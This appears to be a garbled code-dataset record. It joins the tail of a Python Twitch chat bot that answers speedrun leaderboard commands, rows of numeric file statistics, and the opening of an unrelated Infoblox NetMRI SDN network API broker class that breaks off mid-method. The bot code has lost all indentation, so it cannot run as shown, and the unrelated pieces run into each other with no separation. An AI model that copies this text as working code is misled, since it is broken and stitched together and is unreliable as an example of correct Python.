#get title of current channel
title = getStreamTitle(USER_ID)
if isEmulator(title):
emulators = 'true'
else:
emulators = 'false'
game, platform, platform_title = getGame(USER_ID)
if '[' in title and ']' in title:
for i in range(len(PLATFORMS)):
if PLATFORMS[i][0].lower() == title.split('[')[1].split(']')[0]:
platform = PLATFORMS[i][1]
platform_title = PLATFORMS[i][0]
break
category = None
category_title = None
#Check again to see if an argument was specified
if argument == False:
for i in range(len(CATEGORIES)):
if CATEGORIES[i][0].lower() in title:
category = CATEGORIES[i][1]
category_title = CATEGORIES[i][0]
break
elif argument == True:
specified_category = message.lower().split(input, 1)[-1].strip()
for i in range(len(CATEGORIES)):
if specified_category == CATEGORIES[i][0].lower():
category_title = CATEGORIES[i][0]
category = CATEGORIES[i][1]
break
if category == None:
sendMessage(s, CHANNEL, "Error: Invalid category specified")
cooldown()
return
if game == None:
sendMessage(s, CHANNEL, "Error: No game/category info found in stream title")
cooldown()
return
if category != None:
try:
response = urlopen('https://www.speedrun.com/api/v1/leaderboards/{}/category/{}?top=3&embed=players&platform={}&emulators={}'.format(game, category, platform, emulators))
except urllib.error.HTTPError as err:
sendMessage(s, CHANNEL, "HTTPError: Please try again")
cooldown()
return
readable = response.read().decode('utf-8')
lst = loads(readable)
runner = lst['data']['players']['data'][2]['names']['international']
time_in_sec = int(lst['data']['runs'][2]['run']['times']['realtime_t'])
hours = divmod(time_in_sec, 3600)
minutes = divmod(hours[1], 60)
seconds = minutes[1]
place3rd = ''
if hours[0] > 0:
place3rd = str(hours[0]) + "h " + str(minutes[0]) + "m " + str(seconds) + "s "
elif minutes[0] > 0:
place3rd = str(minutes[0]) + "m " + str(seconds) + "s "
else:
place3rd = str(seconds) + "s "
sendMessage(s, CHANNEL, "The 3rd place time for " + category_title + " is " + place3rd + "by " + runner + ".")
cooldown()
return
elif category == None:
sendMessage(s, CHANNEL, "Error: No game/category info found in stream title")
cooldown()
return
def fourth(input):
if input == message.lower().split()[0].strip():
#Check to see if an argument is specified first
argument = False
try:
message.lower().split()[1]
except IndexError as err:
pass
else:
argument = True
#get user ID of current channel
try:
USER_ID = getUserID(CHANNEL)
except LookupError as err:
sendMessage(s, CHANNEL, "User not found")
cooldown()
return
#get title of current channel
title = getStreamTitle(USER_ID)
if isEmulator(title):
emulators = 'true'
else:
emulators = 'false'
game, platform, platform_title = getGame(USER_ID)
if '[' in title and ']' in title:
for i in range(len(PLATFORMS)):
if PLATFORMS[i][0].lower() == title.split('[')[1].split(']')[0]:
platform = PLATFORMS[i][1]
platform_title = PLATFORMS[i][0]
break
category = None
category_title = None
#Check again to see if an argument was specified
if argument == False:
for i in range(len(CATEGORIES)):
if CATEGORIES[i][0].lower() in title:
category = CATEGORIES[i][1]
category_title = CATEGORIES[i][0]
break
elif argument == True:
specified_category = message.lower().split(input, 1)[-1].strip()
for i in range(len(CATEGORIES)):
if specified_category == CATEGORIES[i][0].lower():
category_title = CATEGORIES[i][0]
category = CATEGORIES[i][1]
break
if category == None:
sendMessage(s, CHANNEL, "Error: Invalid category specified")
cooldown()
return
if game == None:
sendMessage(s, CHANNEL, "Error: No game/category info found in stream title")
cooldown()
return
if category != None:
try:
response = urlopen('https://www.speedrun.com/api/v1/leaderboards/{}/category/{}?top=4&embed=players&platform={}&emulators={}'.format(game, category, platform, emulators))
except urllib.error.HTTPError as err:
sendMessage(s, CHANNEL, "HTTPError: Please try again")
cooldown()
return
readable = response.read().decode('utf-8')
lst = loads(readable)
runner = lst['data']['players']['data'][3]['names']['international']
time_in_sec = int(lst['data']['runs'][3]['run']['times']['realtime_t'])
hours = divmod(time_in_sec, 3600)
minutes = divmod(hours[1], 60)
seconds = minutes[1]
place4th = ''
if hours[0] > 0:
place4th = str(hours[0]) + "h " + str(minutes[0]) + "m " + str(seconds) + "s "
elif minutes[0] > 0:
place4th = str(minutes[0]) + "m " + str(seconds) + "s "
else:
place4th = str(seconds) + "s "
sendMessage(s, CHANNEL, "The 4th place time for " + category_title + " is " + place4th + "by " + runner + ".")
cooldown()
return
elif category == None:
sendMessage(s, CHANNEL, "Error: No game/category info found in stream title")
cooldown()
return
def fifth(input):
if input == message.lower().split()[0].strip():
#Check to see if an argument is specified first
argument = False
try:
message.lower().split()[1]
except IndexError as err:
pass
else:
argument = True
#get user ID of current channel
try:
USER_ID = getUserID(CHANNEL)
except LookupError as err:
sendMessage(s, CHANNEL, "User not found")
cooldown()
return
#get title of current channel
title = getStreamTitle(USER_ID)
if isEmulator(title):
emulators = 'true'
else:
emulators = 'false'
game, platform, platform_title = getGame(USER_ID)
if '[' in title and ']' in title:
for i in range(len(PLATFORMS)):
if PLATFORMS[i][0].lower() == title.split('[')[1].split(']')[0]:
platform = PLATFORMS[i][1]
platform_title = PLATFORMS[i][0]
break
category = None
category_title = None
#Check again to see if an argument was specified
if argument == False:
for i in range(len(CATEGORIES)):
if CATEGORIES[i][0].lower() in title:
category = CATEGORIES[i][1]
category_title = CATEGORIES[i][0]
break
elif argument == True:
specified_category = message.lower().split(input, 1)[-1].strip()
for i in range(len(CATEGORIES)):
if specified_category == CATEGORIES[i][0].lower():
category_title = CATEGORIES[i][0]
category = CATEGORIES[i][1]
break
if category == None:
sendMessage(s, CHANNEL, "Error: Invalid category specified")
cooldown()
return
if game == None:
sendMessage(s, CHANNEL, "Error: No game/category info found in stream title")
cooldown()
return
if category != None:
try:
response = urlopen('https://www.speedrun.com/api/v1/leaderboards/{}/category/{}?top=5&embed=players&platform={}&emulators={}'.format(game, category, platform, emulators))
except urllib.error.HTTPError as err:
sendMessage(s, CHANNEL, "HTTPError: Please try again")
cooldown()
return
readable = response.read().decode('utf-8')
lst = loads(readable)
runner = lst['data']['players']['data'][4]['names']['international']
time_in_sec = int(lst['data']['runs'][4]['run']['times']['realtime_t'])
hours = divmod(time_in_sec, 3600)
minutes = divmod(hours[1], 60)
seconds = minutes[1]
place5th = ''
if hours[0] > 0:
place5th = str(hours[0]) + "h " + str(minutes[0]) + "m " + str(seconds) + "s "
elif minutes[0] > 0:
place5th = str(minutes[0]) + "m " + str(seconds) + "s "
else:
place5th = str(seconds) + "s "
sendMessage(s, CHANNEL, "The 5th place time for " + category_title + " is " + place5th + "by " + runner + ".")
cooldown()
return
elif category == None:
sendMessage(s, CHANNEL, "Error: No game/category info found in stream title")
cooldown()
return
#Returns the channel owner's personal best time for the category that's written in the stream title
def personalBest(input):
if input == message.lower().split()[0]:
SRC_USERNAME = ''
for i in channel_list:
if CHANNEL in i:
SRC_USERNAME = i.split(":")[1].strip('\n')
break
else:
SRC_USERNAME = ADMIN
category_specified = False
try:
message.split()[2]
except IndexError as err:
pass
else:
category_specified = True
#get user ID of current channel
try:
USER_ID = getUserID(CHANNEL)
except LookupError as err:
sendMessage(s, CHANNEL, "User not found")
cooldown()
return
#get title of current channel
title = getStreamTitle(USER_ID)
game, platform, platform_title = getGame(USER_ID)
if '[' in title and ']' in title:
for i in range(len(PLATFORMS)):
if PLATFORMS[i][0].lower() == title.split('[')[1].split(']')[0]:
platform_title = PLATFORMS[i][0]
break
category_title = None
if category_specified == True:
category_title = message.lower().strip('!pb ')
first_word = category_title.lower().split()[0]
category_title = category_title.split(first_word, 1)[-1].strip()
check = False
for i in range(len(CATEGORIES)):
if CATEGORIES[i][0].lower() == category_title:
check = True
category_title = CATEGORIES[i][0]
break
if check == False:
sendMessage(s, CHANNEL, "Error: Invalid category specified")
cooldown()
return
elif category_specified == False:
for i in range(len(CATEGORIES)):
if CATEGORIES[i][0].lower() in title:
category_title = CATEGORIES[i][0]
break
if game == None:
sendMessage(s, CHANNEL, "Error: No game/category info found in stream title")
cooldown()
return
username = None
try:
message.split()[1]
except IndexError as err:
username = SRC_USERNAME
else:
username = message.split()[1]
if category_title != None:
try:
response = urlopen('https://www.speedrun.com/api/v1/users/{}/personal-bests?embed=category,game,platform'.format(username))
except urllib.error.HTTPError as err:
sendMessage(s, CHANNEL, "Error: Speedrun.com user not found")
cooldown()
return
readable = response.read().decode('utf-8')
lst = loads(readable)
place = None
time_in_sec = None
for cat in lst['data']:
if cat['category']['data']['name'].lower() == category_title.lower() and cat['game']['data']['abbreviation'].lower() == game and cat['platform']['data']['name'].lower() == platform_title.lower():
time_in_sec = int(cat['run']['times']['realtime_t'])
place = cat['place']
break
if place == None:
sendMessage(s, CHANNEL, username.title() + " currently does not have a PB for " + category_title + " on the leaderboard.")
cooldown()
return
ordinal = lambda n: "%d%s" % (n,"tsnrhtdd"[(math.floor(n/10)%10!=1)*(n%10<4)*n%10::4])
hours = divmod(time_in_sec, 3600)
minutes = divmod(hours[1], 60)
seconds = minutes[1]
pb = ''
if hours[0] > 0:
pb = str(hours[0]) + "h " + str(minutes[0]) + "m " + str(seconds) + "s"
elif minutes[0] > 0:
pb = str(minutes[0]) + "m " + str(seconds) + "s"
else:
pb = str(seconds) + "s"
sendMessage(s, CHANNEL, username.title() + "\'s " + category_title + " PB is " + pb + " (" + ordinal(place) + " place).")
cooldown()
elif category_title == None:
sendMessage(s, CHANNEL, "Error: No game/category info found in stream title")
cooldown()
return
def lastPB(input):
if input == message.lower().split()[0]:
SRC_USERNAME = ''
for i in channel_list:
if CHANNEL in i:
SRC_USERNAME = i.split(":")[1].strip('\n')
break
else:
SRC_USERNAME = ADMIN
category_specified = False
try:
message.split()[2]
except IndexError as err:
pass
else:
category_specified = True
#get user ID of current channel
try:
USER_ID = getUserID(CHANNEL)
except LookupError as err:
sendMessage(s, CHANNEL, "User not found")
cooldown()
return
#get title of current channel
title = getStreamTitle(USER_ID)
game, platform, platform_title = getGame(USER_ID)
if '[' in title and ']' in title:
for i in range(len(PLATFORMS)):
if PLATFORMS[i][0].lower() == title.split('[')[1].split(']')[0]:
platform_title = PLATFORMS[i][0]
break
category_title = None
if category_specified == True:
category_title = message.lower().strip('!lastpb ')
first_word = category_title.lower().split()[0]
category_title = category_title.split(first_word, 1)[-1].strip()
check = False
for i in range(len(CATEGORIES)):
if CATEGORIES[i][0].lower() == category_title:
check = True
category_title = CATEGORIES[i][0]
break
if check == False:
sendMessage(s, CHANNEL, "Error: Invalid category specified")
cooldown()
return
elif category_specified == False:
for i in range(len(CATEGORIES)):
if CATEGORIES[i][0].lower() in title:
category_title = CATEGORIES[i][0]
break
if game == None:
sendMessage(s, CHANNEL, "Error: No game/category info found in stream title")
cooldown()
return
username = None
try:
message.split()[1]
except IndexError as err:
username = SRC_USERNAME
else:
username = message.split()[1]
if category_title != None:
try:
response = urlopen('https://www.speedrun.com/api/v1/users/{}/personal-bests?embed=category,game,platform'.format(username))
except urllib.error.HTTPError as err:
sendMessage(s, CHANNEL, "Error: Speedrun.com user not found")
cooldown()
return
readable = response.read().decode('utf-8')
lst = loads(readable)
place = None
time_in_sec = None
for cat in lst['data']:
if cat['category']['data']['name'].lower() == category_title.lower() and cat['game']['data']['abbreviation'].lower() == game and cat['platform']['data']['name'].lower() == platform_title.lower():
place = cat['place']
date = cat['run']['date']
break
if place == None:
sendMessage(s, CHANNEL, username.title() + " currently does not have a PB for " + category_title + " on the leaderboard.")
cooldown()
return
sendMessage(s, CHANNEL, username.title() + " last PBed in " + category_title + " on " + date + ".")
cooldown()
elif category_title == None:
sendMessage(s, CHANNEL, "Error: No game/category info found in stream title")
cooldown()
return
def runs(input):
if input == message.lower().split()[0]:
SRC_USERNAME = ''
for i in channel_list:
if CHANNEL in i:
SRC_USERNAME = i.split(":")[1].strip('\n')
break
else:
SRC_USERNAME = ADMIN
#get user ID of current channel
try:
USER_ID = getUserID(CHANNEL)
except LookupError as err:
sendMessage(s, CHANNEL, "User not found")
cooldown()
return
#get title of current channel
title = getStreamTitle(USER_ID)
game, platform, platform_title = getGame(USER_ID)
if '[' in title and ']' in title:
for i in range(len(PLATFORMS)):
if PLATFORMS[i][0].lower() == title.split('[')[1].split(']')[0]:
platform_title = PLATFORMS[i][0]
break
if game == None:
sendMessage(s, CHANNEL, "Error: No game info found")
cooldown()
return
username = None
try:
message.split()[1]
except IndexError as err:
username = SRC_USERNAME
else:
username = message.split()[1]
try:
response = urlopen('https://www.speedrun.com/api/v1/users/{}/personal-bests?embed=game,platform,category&game={}'.format(username, game))
except urllib.error.HTTPError as err:
sendMessage(s, CHANNEL, "Error: Speedrun.com user not found")
cooldown()
return
readable = response.read().decode('utf-8')
lst = loads(readable)
ordinal = lambda n: "%d%s" % (n,"tsnrhtdd"[(math.floor(n/10)%10!=1)*(n%10<4)*n%10::4])
place = None
time_in_sec = None
list_of_runs = []
if lst['data'] != []:
pass
else:
sendMessage(s, CHANNEL, username.title() + " has no submitted runs for the current game.")
cooldown()
return
for run in lst['data']:
#if run['platform']['data']['name'].lower() == platform_title.lower():
time_in_sec = int(run['run']['times']['realtime_t'])
place = run['place']
category_title = run['category']['data']['name']
hours = divmod(time_in_sec, 3600)
minutes = divmod(hours[1], 60)
seconds = minutes[1]
pb = ''
if hours[0] > 0:
pb = str(hours[0]) + "h " + str(minutes[0]) + "m " + str(seconds) + "s"
elif minutes[0] > 0:
pb = str(minutes[0]) + "m " + str(seconds) + "s"
else:
pb = str(seconds) + "s"
#add run to the list to be printed
list_of_runs.append(category_title + " in " + pb + " (" + ordinal(place) + ")")
game_title = lst['data'][0]['game']['data']['names']['international']
run_message = username.title() + "\'s " + game_title + " PBs: " + ", ".join(list_of_runs) + "."
if len(run_message) < 500:
sendMessage(s, CHANNEL, run_message)
elif len(run_message) < 1000:
run_message1 = run_message[0:500]
run_message2 = run_message[500:]
sendMessage(s, CHANNEL, run_message1)
sendMessage(s, CHANNEL, run_message2)
cooldown()
else:
sendMessage(s, CHANNEL, "This user's list of PBs is too long. Go look it up.")
cooldown()
#Tells user the leaderboard standing of the channel owner, or a specified user
def place(input):
if input == message.lower().split()[0]:
SRC_USERNAME = ''
for i in channel_list:
if CHANNEL in i:
SRC_USERNAME = i.split(":")[1].strip('\n')
break
else:
SRC_USERNAME = ADMIN
category_specified = False
try:
message.split()[2]
except IndexError as err:
pass
else:
category_specified = True
username = None
try:
message.split()[1]
except IndexError as err:
username = SRC_USERNAME
else:
username = message.split()[1]
#get user ID of current channel
try:
USER_ID = getUserID(CHANNEL)
except LookupError as err:
sendMessage(s, CHANNEL, "User not found")
cooldown()
return
#get title of current channel
title = getStreamTitle(USER_ID)
game, platform, platform_title = getGame(USER_ID)
if '[' in title and ']' in title:
for i in range(len(PLATFORMS)):
if PLATFORMS[i][0].lower() == title.split('[')[1].split(']')[0]:
platform_title = PLATFORMS[i][0]
break
category_title = None
if category_specified == True:
category_title = message.lower().strip('!place ')
first_word = category_title.lower().split()[0]
category_title = category_title.split(first_word, 1)[-1].strip()
check = False
for i in range(len(CATEGORIES)):
if CATEGORIES[i][0].lower() == category_title:
check = True
category_title = CATEGORIES[i][0]
break
if check == False:
sendMessage(s, CHANNEL, "Error: Invalid category specified")
cooldown()
return
elif category_specified == False:
for i in range(len(CATEGORIES)):
if CATEGORIES[i][0].lower() in title:
category_title = CATEGORIES[i][0]
break
if game == None:
sendMessage(s, CHANNEL, "Error: No game/category info found in stream title")
cooldown()
return
if category_title != None:
try:
response = urlopen('https://www.speedrun.com/api/v1/users/{}/personal-bests?embed=category,game,platform'.format(username))
except urllib.error.HTTPError as err:
sendMessage(s, CHANNEL, "Error: Speedrun.com user not found")
cooldown()
return
readable = response.read().decode('utf-8')
lst = loads(readable)
place = None
time_in_sec = None
for cat in lst['data']:
if cat['category']['data']['name'].lower() == category_title.lower() and cat['game']['data']['abbreviation'].lower() == game and cat['platform']['data']['name'].lower() == platform_title.lower():
time_in_sec = int(cat['run']['times']['realtime_t'])
place = cat['place']
break
if place == None:
sendMessage(s, CHANNEL, username.title() + " currently does not have a PB for " + category_title + " on the leaderboard.")
cooldown()
return
ordinal = lambda n: "%d%s" % (n,"tsnrhtdd"[(math.floor(n/10)%10!=1)*(n%10<4)*n%10::4])
sendMessage(s, CHANNEL, username.title() + " is in " + ordinal(place) + " place for " + category_title + ".")
elif category_title == None:
sendMessage(s, CHANNEL, "Error: No game/category info found in stream title")
cooldown()
return
def leaderboard(input):
if input == message.lower().strip():
#get user ID of current channel
try:
USER_ID = getUserID(CHANNEL)
except LookupError as err:
sendMessage(s, CHANNEL, "User not found")
cooldown()
return
#get title of current channel
title = getStreamTitle(USER_ID)
game, platform, platform_title = getGame(USER_ID)
game_title = None
for i in range(len(GAMES)):
if GAMES[i][1] == game:
game_title = GAMES[i][0]
break
category = None
category_title = None
for i in range(len(CATEGORIES)):
if CATEGORIES[i][0].lower() in title:
category = CATEGORIES[i][1]
category_title = CATEGORIES[i][0]
break
if game == None:
sendMessage(s, CHANNEL, "Error: No game/category info found in stream title")
cooldown()
return
if category != None:
sendMessage(s, CHANNEL, game_title + " " + category_title + " Leaderboard: https://www.speedrun.com/{}#{}".format(game, category))
cooldown()
return
elif category == None:
sendMessage(s, CHANNEL, "Error: No game/category info found in stream title")
cooldown()
return
def listRules(input):
if input == message.lower().strip():
#get user ID of current channel
try:
USER_ID = getUserID(CHANNEL)
except LookupError as err:
sendMessage(s, CHANNEL, "User not found")
cooldown()
return
#get title of current channel
title = getStreamTitle(USER_ID)
game, platform, platform_title = getGame(USER_ID)
game_title = None
for i in range(len(GAMES)):
if GAMES[i][1] == game:
game_title = GAMES[i][0]
break
category = None
category_title = None
for i in range(len(CATEGORIES)):
if CATEGORIES[i][0].lower() in title:
category = CATEGORIES[i][1]
category_title = CATEGORIES[i][0]
break
if game == None:
sendMessage(s, CHANNEL, "Error: No game/category info found in stream title")
cooldown()
return
if category != None:
try:
response = urlopen('https://www.speedrun.com/api/v1/games/{}/categories'.format(game))
except urllib.error.HTTPError as err:
sendMessage(s, CHANNEL, "HTTP Error")
cooldown()
return
readable = response.read().decode('utf-8')
lst = loads(readable)
rules = ' '
for cat in lst['data']:
if cat['name'].lower() == category_title.lower():
rules = cat['rules'].split('\r\n')
for rule in rules:
rule = rule.strip('-')
list_of_rules = ' '.join(rules)
sendMessage(s, CHANNEL, game_title + " " + category_title + " rules: " + list_of_rules)
cooldown()
return
elif category == None:
sendMessage(s, CHANNEL, "Error: No game/category info found in stream title")
cooldown()
return
def listGames(input):
if input == message.lower().strip():
sendMessage(s, CHANNEL, "Games currently supported: " + ", ".join([game[0] for game in GAMES]))
cooldown()
return
#Returns a kadgar.net link with the channel owner and the other racers if a race is happening
def raceCommand(input):
if input == message.lower().strip():
#get user ID of current channel
try:
USER_ID = getUserID(CHANNEL)
except LookupError as err:
sendMessage(s, CHANNEL, "User not found")
cooldown()
return
#get title of current channel
title = getStreamTitle(USER_ID)
if 'race with' in title:
pass
elif 'race with' not in title:
sendMessage(s, CHANNEL, CHANNEL.title() + " is not currently racing or no racers found in stream title.")
cooldown()
return
title_list = title.split()
r = title_list.index('with') + 1
contenders = []
length = len(title_list)
diff = length - r
while True:
contenders.append(title_list[r].strip(','))
diff = diff - 1
r = r + 1
if diff == 0:
break
sendMessage(s, CHANNEL, "Race link: http://kadgar.net/live/" + CHANNEL + "/" + "/".join(contenders))
cooldown()
#Displays commands
def getCommands(input):
if input == message.strip().lower():
sendMessage(s, CHANNEL, '/me commands: !wr • !2nd • !3rd • !4th • !5th • !pb • !lastpb • !runs • !place • !leaderboard • !rules • !race • !games • !help')
cooldown()
#Documentation
def docs(input):
if input == message.lower().strip():
sendMessage(s, CHANNEL, "speedrunb0t's documentation can be found here: https://dechrissen.github.io/speedrunb0t/#bot-commands")
cooldown()
#Global cooldown
def cooldown():
if user == ADMIN or user == CHANNEL:
pass
elif user:
abort_after = COOLDOWN
start = time.time()
while True:
delta = time.time() - start
if delta >= abort_after:
break
#Checks if a message is from Twitch or a user
def Console(line):
if "PRIVMSG" in line:
return False
else:
return True
#Quits the bot program (admin only)
def quitCommand(input):
if input == message.strip().lower() and user == ADMIN:
sendMessage(s, ADMIN, "/me has disconnected.")
#for chan in channel_list:
#chan = chan.split(":")[0]
#if chan != ADMIN:
#sendMessage(s, chan, "/me [Disconnected]")
quit()
elif input == message.strip():
sendMessage(s, CHANNEL, "@" + user.title() + " Only the Administrator may use the !kill command.")
cooldown()
s = openSocket()
joinRoom(s)
readbuffer = ""
with open("channels.txt", "r") as f:
channel_list = f.readlines()
for chan in channel_list:
chan = chan.split(":")[0]
if chan != ADMIN:
s.send(("JOIN #" + chan + "\r\n").encode())
#sendMessage(s, chan, "/me [Connected]")
while True:
readbuffer = s.recv(1024)
readbuffer = readbuffer.decode()
temp = readbuffer.split("\n")
readbuffer = readbuffer.encode()
readbuffer = temp.pop()
for line in temp:
try:
print(line)
except OSError as err:
print('OSError: Invalid symbol')
continue
if "PING" in line and Console(line):
msgg = "PONG tmi.twitch.tv\r\n".encode()
s.send(msgg)
print(msgg)
break
if ".tmi.twitch.tv" in line and Console(line):
break
user = getUser(line)
message = getMessage(line)
CHANNEL = getChannel(line)
if '!' not in message and '$' not in message:
continue
print(user + " said: " + message)
#Chat commands
getCommands('!commands')
worldRecord('!wr')
worldRecord('!1st')
second('!2nd')
third('!3rd')
fourth('!4th')
fifth('!5th')
personalBest('!pb')
lastPB('!lastpb')
runs('!runs')
place('!place')
leaderboard('!leaderboard')
listRules('!rules')
listGames('!games')
raceCommand('!race')
setSRCName('!setsrcname')
docs('!help')
joinChannel('$invite')
addChannel('!addchannel')
channels('!channels')
quitCommand('!kill')
continue
| 36.226457
| 211
| 0.523179
| 5,208
| 48,471
| 4.813556
| 0.064324
| 0.045953
| 0.06897
| 0.035422
| 0.800351
| 0.784634
| 0.76445
| 0.739998
| 0.731581
| 0.718218
| 0
| 0.014172
| 0.356543
| 48,471
| 1,337
| 212
| 36.253553
| 0.789189
| 0.038992
| 0
| 0.774077
| 0
| 0.009901
| 0.132409
| 0.003997
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023402
| false
| 0.011701
| 0.010801
| 0
| 0.109811
| 0.0036
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e8d60ce7886685b9d361abd82b81c21ee2c199ad
| 31,150
|
py
|
Python
|
infoblox_netmri/api/broker/v3_6_0/sdn_network_broker.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
infoblox_netmri/api/broker/v3_6_0/sdn_network_broker.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
infoblox_netmri/api/broker/v3_6_0/sdn_network_broker.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
from ..broker import Broker
class SdnNetworkBroker(Broker):
controller = "sdn_networks"
def index(self, **kwargs):
"""Lists the available sdn networks. Any of the inputs listed may be be used to narrow the list; other inputs will be ignored. Of the various ways to query lists, using this method is most efficient.
**Inputs**
| ``api version min:`` 3.4
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param sdn_network_id: The internal NetMRI identifier for this network
:type sdn_network_id: Array of Integer
| ``api version min:`` 3.4
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param sdn_network_key: The unique identifier of each network at the SDN controller side
:type sdn_network_key: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of sdn network methods. The listed methods will be called on each sdn network returned and included in the output. Available methods are: fabric_handle.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` sdn_network_id
:param sort: The data field(s) to use for sorting the output. Default is sdn_network_id. Valid values are sdn_network_id, sdn_network_key, sdn_network_name, fabric_id, virtual_network_id, StartTime, EndTime.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each SdnNetwork. Valid values are sdn_network_id, sdn_network_key, sdn_network_name, fabric_id, virtual_network_id, StartTime, EndTime. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return sdn_networks: An array of the SdnNetwork objects that match the specified input criteria.
:rtype sdn_networks: Array of SdnNetwork
"""
return self.api_list_request(self._get_method_fullname("index"), kwargs)
def search(self, **kwargs):
"""Lists the available sdn networks matching the input criteria. This method provides a more flexible search interface than the index method, but searching using this method is more demanding on the system and will not perform to the same level as the index method. The input fields listed below will be used as in the index method, to filter the result, along with the optional query string and XML filter described below.
**Inputs**
| ``api version min:`` 3.4
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param EndTime: The ending date/time of this network
:type EndTime: Array of DateTime
| ``api version min:`` 3.4
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StartTime: The starting date/time of this network
:type StartTime: Array of DateTime
| ``api version min:`` 3.4
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param fabric_id: Identifier of SdnSetting from which this network was collected
:type fabric_id: Array of Integer
| ``api version min:`` 3.4
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param sdn_network_id: The internal NetMRI identifier for this network
:type sdn_network_id: Array of Integer
| ``api version min:`` 3.4
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param sdn_network_key: The unique identifier of each network at the SDN controller side
:type sdn_network_key: Array of String
| ``api version min:`` 3.4
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param sdn_network_name: Name of SDN network
:type sdn_network_name: Array of String
| ``api version min:`` 3.4
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param virtual_network_id: ID of Virtual Network which is assigned to this network
:type virtual_network_id: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of sdn network methods. The listed methods will be called on each sdn network returned and included in the output. Available methods are: fabric_handle.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` sdn_network_id
:param sort: The data field(s) to use for sorting the output. Default is sdn_network_id. Valid values are sdn_network_id, sdn_network_key, sdn_network_name, fabric_id, virtual_network_id, StartTime, EndTime.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each SdnNetwork. Valid values are sdn_network_id, sdn_network_key, sdn_network_name, fabric_id, virtual_network_id, StartTime, EndTime. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param query: This value will be matched against sdn networks, looking to see if one or more of the listed attributes contain the passed value. You may also surround the value with '/' and '/' to perform a regular expression search rather than a containment operation. Any record that matches will be returned. The attributes searched are: EndTime, StartTime, fabric_id, sdn_network_id, sdn_network_key, sdn_network_name, virtual_network_id.
:type query: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return sdn_networks: An array of the SdnNetwork objects that match the specified input criteria.
:rtype sdn_networks: Array of SdnNetwork
"""
return self.api_list_request(self._get_method_fullname("search"), kwargs)
def find(self, **kwargs):
